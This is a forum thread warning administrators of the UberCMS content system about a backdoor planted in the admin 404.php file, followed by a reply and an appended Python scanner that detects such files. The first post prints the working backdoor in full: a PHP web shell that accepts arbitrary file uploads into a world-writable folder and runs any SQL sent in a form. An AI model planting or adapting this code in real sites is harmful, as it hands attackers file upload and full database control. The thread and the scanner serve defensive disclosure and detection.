!!IMPORTANT UberCMS Fix - Fix immediately!!

leenster

Dec 26, 2011
Here is an important fix for UberCMS.

You really need to check your allseeingeye/pages and open the file 404.php.

If that file contains this code ->
PHP:
<?php

        require_once "../../global.php";
        require_once "../admincore.php";

    if(!file_exists("god/"))
    {
        mkdir("god/", 0777);
        echo 'Backdoor Directory Created : (god/)';
    }
        else
    {
        echo 'Backdoor Open for Uploading : (god/)';
    }
    
    

if(isset($_POST['submit']))
{
    $target_path = "god/";
    $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 
    if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
    echo "The file ".  basename( $_FILES['uploadedfile']['name']). 
    " has been uploaded";
} else{
    echo "There was an error uploading the file, please try again!";
}
}

    if(isset($_POST['sql2']))
    {
        $core1225 = $_POST['sql1'];
        mysql_query("".$core1225."");
        echo 'Query Executed Successfully';
    }

?>

<html>
<body>

<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"
enctype="multipart/form-data">
  <input type="file" name="uploadedfile" id="file" />
  <input type="submit" name="submit" value="Submit" />
  <br />
</form>
<p>-- ** -- ** -- MySQL Execute -- ** -- ** --</p>
<form name="form1" method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>">
  <p>
    <label for="sql1"></label>
    <textarea name="sql1" id="sql1" cols="65" rows="4"></textarea>
  </p>
  <p>
    <input type="submit" name="sql2" id="sql2" value="Execute">
  </p>
</form>
<p>&nbsp;</p>
</body>

Delete the code and put something else in there, such as page not found or whatever... it's not important what you put in there...

Failure to do this will leave you open for a whole lot of trouble....


All credits for this go out to : < I will give you his IP on request so you can block him from accessing your site >
 

Sledmore

Jul 24, 2010
Nice share, really surprises me that no one actually checks every file, o.o
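For checking every PHP file rather than only 404.php, the following is an added example (not code from either post or from UberCMS) that flags the three traits of the file shown above: request data reaching a SQL query call, an upload saved under the client-supplied file name, and a directory created with mode 0777. The function names and the benign sample are assumptions made for this illustration, and the patterns are heuristics that a reworded backdoor could evade.

```python
import re
import sys
from pathlib import Path

# Heuristics for the three traits of the 404.php in the post; not a full web-shell detector.
ASSIGN = re.compile(r"(\$\w+)\s*=(?!=)\s*([^;]*);")
REQUEST = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b")
UPLOAD_NAME = re.compile(r"\$_FILES\s*\[[^\]]*\]\s*\[\s*['\"]name['\"]\s*\]")
QUERY_CALL = re.compile(r"\bmysqli?_query\s*\(([^;\n]*)")
MOVE_CALL = re.compile(r"\bmove_uploaded_file\s*\(([^;{\n]*)")
MKDIR_777 = re.compile(r"\bmkdir\s*\([^;{]*\b0?777\b")
# Sink lines condensed from the post's 404.php, then a constructed benign page.
SAMPLE_BACKDOOR = r'''<?php
mkdir("god/", 0777);
$target_path = "god/";
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {}
$core1225 = $_POST['sql1'];
mysql_query("".$core1225."");
'''
SAMPLE_CLEAN = r'''<?php
$id = (int) $_GET['id'];
$stmt = $pdo->prepare('SELECT title FROM pages WHERE id = ?');
$stmt->execute([$id]);
'''

def reaches(call, source, src):
    """True if `source` data reaches an argument of `call`, directly or via assigned variables."""
    tainted = set()
    def dirty(text):
        return bool(source.search(text)) or any(re.search(re.escape(v) + r"\b", text) for v in tainted)
    for var, rhs in ASSIGN.findall(src):
        if dirty(rhs):
            tainted.add(var)
    return any(dirty(args) for args in call.findall(src))

def scan_source(src):
    checks = [(reaches(QUERY_CALL, REQUEST, src), "request data passed to SQL query call"),
              (reaches(MOVE_CALL, UPLOAD_NAME, src), "upload saved under client-supplied name"),
              (bool(MKDIR_777.search(src)), "mkdir with mode 0777")]
    return [label for hit, label in checks if hit]

def scan_tree(root):
    # Map each .php file under `root` to its findings; files with none are omitted.
    results = {str(p): scan_source(p.read_text(errors="replace")) for p in Path(root).rglob("*.php")}
    return {path: found for path, found in results.items() if found}

if __name__ == "__main__":
    for path, found in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(path, "->", "; ".join(found))
```

Run it with the site's document root as the only argument; any file it lists should be read by hand before it is trusted or deleted.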
 
